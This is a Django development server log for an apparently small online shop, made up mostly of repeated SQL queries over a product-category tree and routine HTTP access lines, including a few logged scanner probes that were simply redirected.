11:15:02,192 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 11:15:02,206 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 11:15:02] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-10 11:15:07,199 utils 32196 139885071562496 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 11:15:07,205 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 11:15:07,208 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 11:15:07,210 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 11:15:07,213 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 11:15:07,216 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 11:15:07,219 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 11:15:07,222 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 11:15:07,224 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 11:15:07,227 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 11:15:07,230 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 11:15:07] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [10/Dec/2019 11:17:48] "GET / HTTP/1.0" 302 0 [10/Dec/2019 11:23:22] "GET / HTTP/1.0" 302 0 [10/Dec/2019 11:24:03] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.0" 302 0 DEBUG 2019-12-10 11:24:04,237 utils 32196 139885071562496 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'mhi163whqg2b9uu3qh8a8ibuxtvdxkdc' LIMIT 1; args=('mhi163whqg2b9uu3qh8a8ibuxtvdxkdc',) DEBUG 2019-12-10 11:24:04,240 utils 32196 139885071562496 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('mhi163whqg2b9uu3qh8a8ibuxtvdxkdc', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-24T11:24:04.238362+00:00'::timestamptz); args=('mhi163whqg2b9uu3qh8a8ibuxtvdxkdc', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 24, 11, 24, 4, 238362, tzinfo=)) [10/Dec/2019 11:24:04] "GET /login/?next=/%3FXDEBUG_SESSION_START%3Dphpstorm HTTP/1.0" 200 1850 [10/Dec/2019 11:25:01] "GET /whm-server-status HTTP/1.0" 301 0 [10/Dec/2019 11:28:25] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-10 11:29:19,985 utils 32196 139885071562496 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 11:29:19,991 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 11:29:19,994 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 11:29:19,996 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 11:29:19,999 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 11:29:20,001 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 11:29:20,004 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 11:29:20,007 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 11:29:20,009 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 11:29:20,011 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 11:29:20,013 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 11:29:20] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-10 11:29:40,570 utils 32196 139885071562496 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 11:29:40,579 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 11:29:40,584 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 11:29:40,588 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 11:29:40,592 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 11:29:40,596 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 11:29:40,600 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 11:29:40,604 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 11:29:40,608 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 11:29:40,612 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 11:29:40,616 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 11:29:40] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-10 11:30:23,333 utils 32196 139885071562496 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 11:30:23,342 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 11:30:23,347 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 11:30:23,352 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 11:30:23,356 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 11:30:23,359 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 11:30:23,361 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 11:30:23,363 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 11:30:23,365 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 11:30:23,367 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 11:30:23,369 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 11:30:23] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [10/Dec/2019 11:33:27] "GET / HTTP/1.0" 302 0 [10/Dec/2019 11:38:30] "GET / HTTP/1.0" 302 0 [10/Dec/2019 11:40:36] "GET / HTTP/1.0" 302 0 [10/Dec/2019 11:43:33] "GET / HTTP/1.0" 302 0 [10/Dec/2019 11:48:36] "GET / HTTP/1.0" 302 0 [10/Dec/2019 11:53:38] "GET / HTTP/1.0" 302 0 [10/Dec/2019 12:00:02] "GET / HTTP/1.0" 302 0 [10/Dec/2019 12:05:03] "GET / HTTP/1.0" 302 0 [10/Dec/2019 12:10:06] "GET / HTTP/1.0" 302 0 [10/Dec/2019 12:15:00] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-10 12:15:00,581 utils 32196 139885071562496 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'c3v3010enz036g94qybfrlt9flkrn3va' LIMIT 1; args=('c3v3010enz036g94qybfrlt9flkrn3va',) DEBUG 2019-12-10 12:15:00,583 utils 32196 139885071562496 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('c3v3010enz036g94qybfrlt9flkrn3va', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-24T12:15:00.581510+00:00'::timestamptz); args=('c3v3010enz036g94qybfrlt9flkrn3va', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 24, 12, 15, 0, 581510, tzinfo=)) [10/Dec/2019 12:15:00] "GET /login/?next=/ HTTP/1.0" 200 1786 [10/Dec/2019 12:15:00] "GET /about-us HTTP/1.0" 301 0 DEBUG 2019-12-10 12:15:00,851 utils 32196 139885071562496 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'about-us'; args=('about-us',) Not Found: /about-us/ [10/Dec/2019 12:15:00] "GET /about-us/ HTTP/1.0" 404 1733 [10/Dec/2019 12:15:08] "GET / HTTP/1.0" 302 0 [10/Dec/2019 12:20:20] "GET / HTTP/1.0" 302 0 [10/Dec/2019 12:30:00] "GET / HTTP/1.0" 302 0 [10/Dec/2019 12:36:00] "GET / HTTP/1.0" 302 0 [10/Dec/2019 12:41:13] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-10 12:47:03,060 utils 32196 139885071562496 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 12:47:03,069 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 12:47:03,074 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 12:47:03,078 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 12:47:03,082 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 12:47:03,087 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 12:47:03,090 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 12:47:03,095 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 12:47:03,100 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 12:47:03,103 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 12:47:03,106 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 12:47:03] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-10 12:47:08,938 utils 32196 139885071562496 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 12:47:08,946 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 12:47:08,951 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 12:47:08,956 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", 